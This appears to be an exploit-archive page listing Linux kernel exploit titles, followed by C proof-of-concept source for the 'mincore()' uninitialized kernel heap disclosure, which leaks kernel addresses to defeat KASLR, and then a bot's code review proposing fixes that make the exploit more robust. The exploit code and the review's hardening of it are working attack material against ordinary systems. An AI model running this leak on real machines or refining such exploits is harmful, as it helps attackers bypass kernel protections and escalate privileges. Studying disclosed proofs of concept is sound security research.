
9 changes to exploits/shellcodes Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Linux 2.6.36 IGMP - Remote Denial of Service Linux Kernel 2.6.36 IGMP - Remote Denial of Service Linux - SELinux W+X Protection Bypass via AIO Linux SELinux - W+X Protection Bypass via AIO Linux group_info refcounter - Overflow Memory Corruption Linux Kernel - 'group_info' refcounter Overflow Memory Corruption Linux io_submit L2TP sendmsg - Integer Overflow Linux Kernel - io_submit L2TP sendmsg Integer Overflow Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) Linux Kernel < 4.5.1 - Off-By-One (PoC) Linux Kernel - 'mincore()' Heap Page Disclosure (PoC) Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow Linux VServer Project 1.2x - CHRoot Breakout Linux VServer Project 1.2x - Chroot Breakout Linux espfix64 - Nested NMIs Interrupting Privilege Escalation Linux (x86) - Memory Sinkhole Privilege Escalation Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation Linux Kernel (x86) - Memory Sinkhole 
Privilege Escalation Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation
/*
|
|
* The source is modified from
|
|
* https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
|
|
* I try to find out infomation useful from the infoleak
|
|
* The kernel address can be easily found out from the uninitialized memory
|
|
* leaked from kernel, which can help bypass kaslr
|
|
*/
|
|
|
|
#define _GNU_SOURCE
|
|
#include <unistd.h>
|
|
#include <sys/mman.h>
|
|
#include <err.h>
|
|
#include <stdio.h>
|
|
|
|
int main(void) {
|
|
unsigned char buf[getpagesize()/sizeof(unsigned char)];
|
|
int right = 1;
|
|
unsigned long addr = 0;
|
|
|
|
/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
|
|
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
|
|
err(1, "mmap");
|
|
|
|
while(right){
|
|
/* Touch a mishandle with this type mapping */
|
|
if (mincore((void*)0x86000000, 0x1000000, buf))
|
|
perror("mincore");
|
|
for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {
|
|
addr = *(unsigned long*)(&buf[n]);
|
|
/* Kernel address space, may need some mask&offset */
|
|
if(addr > 0xffffffff00000000){
|
|
right = 0;
|
|
goto out;
|
|
}
|
|
}
|
|
}
|
|
out:
|
|
printf("%p\n", addr);
|
|
return 0;
|
|
} |
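Review bot: The inner loop reads past the end of `buf`: `addr = *(unsigned long*)(&buf[n]);` loads `sizeof(unsigned long)` bytes starting at `buf[n]` while `n` runs all the way to `getpagesize() - 1`, so on an LP64 target the last seven iterations read stack memory beyond the array (undefined behaviour, and the cast is also an unaligned, aliasing-violating access). Bound the loop by the load width and copy with `memcpy` instead of the cast, e.g. `for (size_t n = 0; n + sizeof addr <= sizeof buf; n++) {` followed by `memcpy(&addr, &buf[n], sizeof addr);`, adding `#include <string.h>`. Separately, `printf("%p\n", addr);` passes an `unsigned long` to `%p`, which is a format/argument mismatch; `printf("%#lx\n", addr);` prints the same value without the mismatch. Note also that if `mincore()` keeps failing the `while(right)` loop never exits because `perror` does not change `right`; I would make the failure `break` or `err(1, "mincore")` so the program cannot spin forever. The whole of `main` is inside this section.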